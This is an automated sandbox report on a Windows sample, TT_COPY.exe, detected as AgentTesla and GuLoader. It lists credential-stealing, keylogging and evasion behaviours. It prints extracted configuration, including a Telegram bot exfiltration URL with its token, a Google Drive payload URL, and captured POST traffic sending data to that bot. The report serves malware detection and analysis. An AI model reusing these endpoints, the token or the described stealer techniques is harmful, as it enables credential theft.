Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TT_COPY.exe

Overview

General Information

Sample Name:TT_COPY.exe
Analysis ID:645327
MD5:0f7bc1de08b9154e6ef43bb7b4baab22
SHA1:246c92892d50e32294864ec20cd62e42892d6f8f
SHA256:7fa60356467aa478d154dcc4c738394d598b9dad765a626eaf79dc5d04ebfdf2
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
PE / OLE file has an invalid certificate
Contains functionality to enumerate device drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • TT_COPY.exe (PID: 2580 cmdline: "C:\Users\user\Desktop\TT_COPY.exe" MD5: 0F7BC1DE08B9154E6EF43BB7B4BAAB22)
    • CasPol.exe (PID: 1624 cmdline: "C:\Users\user\Desktop\TT_COPY.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1728 cmdline: "C:\Users\user\Desktop\TT_COPY.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "1700131455", "Chat URL": "https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocument"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T"}
{"C2 url": "https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000007.00000000.924894081.0000000000D90000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: TT_COPY.exeVirustotal: Detection: 33%Perma Link
            Source: TT_COPY.exeReversingLabs: Detection: 21%
            Source: 00000007.00000000.924894081.0000000000D90000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T"}
            Source: CasPol.exe.1728.7.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1700131455", "Chat URL": "https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocument"}
            Source: CasPol.exe.1728.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendMessage"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20546AD8 CryptUnprotectData,7_2_20546AD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20547220 CryptUnprotectData,7_2_20547220
            Source: TT_COPY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.39.97:443 -> 192.168.11.20:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49757 version: TLS 1.2
            Source: TT_COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da4e10a3b4d49eHost: api.telegram.orgContent-Length: 990Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3f7ipjgt74hjgn7nmh9mdv5ho/1655207400000/12280379857411278905/*/1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-as-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000007.00000002.5729019854.000000001D5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://TUCKxL.com
            Source: CasPol.exe, 00000007.00000002.5729812331.000000001D691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: CasPol.exe, 00000007.00000002.5705878323.0000000001134000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1047854038.000000000113C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1040630227.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000007.00000002.5705878323.0000000001134000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1047854038.000000000113C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1040630227.000000000113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: TT_COPY.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: TT_COPY.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: TT_COPY.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: TT_COPY.exeString found in binary or memory: http://ocsp.sectigo.com0
            Source: CasPol.exe, 00000007.00000002.5729704227.000000001D67C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000007.00000002.5729390937.000000001D64C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7A8mGBYFBx.net
            Source: CasPol.exe, 00000007.00000002.5729390937.000000001D64C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7A8mGBYFBx.nett-
            Source: CasPol.exe, 00000007.00000002.5729704227.000000001D67C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000007.00000002.5729704227.000000001D67C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocument
            Source: CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocumentdocument-----
            Source: CasPol.exe, 00000007.00000003.1047854038.000000000113C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5704775058.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-as-docs.googleusercontent.com/
            Source: CasPol.exe, 00000007.00000002.5705878323.0000000001134000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1041705718.0000000001183000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5705683019.0000000001122000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1047854038.000000000113C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3
            Source: CasPol.exe, 00000007.00000002.5703811420.00000000010B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000007.00000002.5703811420.00000000010B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/t
            Source: CasPol.exe, 00000007.00000002.5704775058.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T
            Source: TT_COPY.exeString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownHTTP traffic detected: POST /bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da4e10a3b4d49eHost: api.telegram.orgContent-Length: 990Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3f7ipjgt74hjgn7nmh9mdv5ho/1655207400000/12280379857411278905/*/1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-as-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.39.97:443 -> 192.168.11.20:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49757 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
            Source: TT_COPY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
            Source: C:\Users\user\Desktop\TT_COPY.exeFile created: C:\Windows\resources\0409Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040755C0_2_0040755C
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_00406D850_2_00406D85
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_70B51BFF0_2_70B51BFF
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6B0580_2_02B6B058
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B610B60_2_02B610B6
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B62A910_2_02B62A91
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B626F70_2_02B626F7
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B60CD40_2_02B60CD4
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B610DA0_2_02B610DA
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6D8100_2_02B6D810
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6101D0_2_02B6101D
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B62A010_2_02B62A01
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B628570_2_02B62857
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6125D0_2_02B6125D
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B626470_2_02B62647
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6264B0_2_02B6264B
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B611A50_2_02B611A5
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B60DAE0_2_02B60DAE
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B627AF0_2_02B627AF
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B64F940_2_02B64F94
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B60F170_2_02B60F17
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B60D090_2_02B60D09
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B629490_2_02B62949
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CAC9F07_2_00CAC9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CA39287_2_00CA3928
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CA26BA7_2_00CA26BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CA2BD87_2_00CA2BD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CA07107_2_00CA0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CAA9807_2_00CAA980
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_1D5198907_2_1D519890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_1D516B627_2_1D516B62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_1D51A1607_2_1D51A160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_1D5195487_2_1D519548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_205428D07_2_205428D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_2054CCF77_2_2054CCF7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_2054F4AB7_2_2054F4AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20543D607_2_20543D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_2054AEE87_2_2054AEE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_2054E3F07_2_2054E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20543D5F7_2_20543D5F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_2054A3407_2_2054A340
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6E616 NtProtectVirtualMemory,0_2_02B6E616
            Source: C:\Users\user\Desktop\TT_COPY.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: TT_COPY.exeStatic PE information: invalid certificate
            Source: TT_COPY.exeVirustotal: Detection: 33%
            Source: TT_COPY.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\TT_COPY.exeFile read: C:\Users\user\Desktop\TT_COPY.exeJump to behavior
            Source: TT_COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\TT_COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\TT_COPY.exe "C:\Users\user\Desktop\TT_COPY.exe"
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\TT_COPY.exe"
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\TT_COPY.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\TT_COPY.exe" Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\TT_COPY.exe" Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\TT_COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsmF806.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@3/3
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Users\user\Desktop\TT_COPY.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: TT_COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000007.00000000.924894081.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
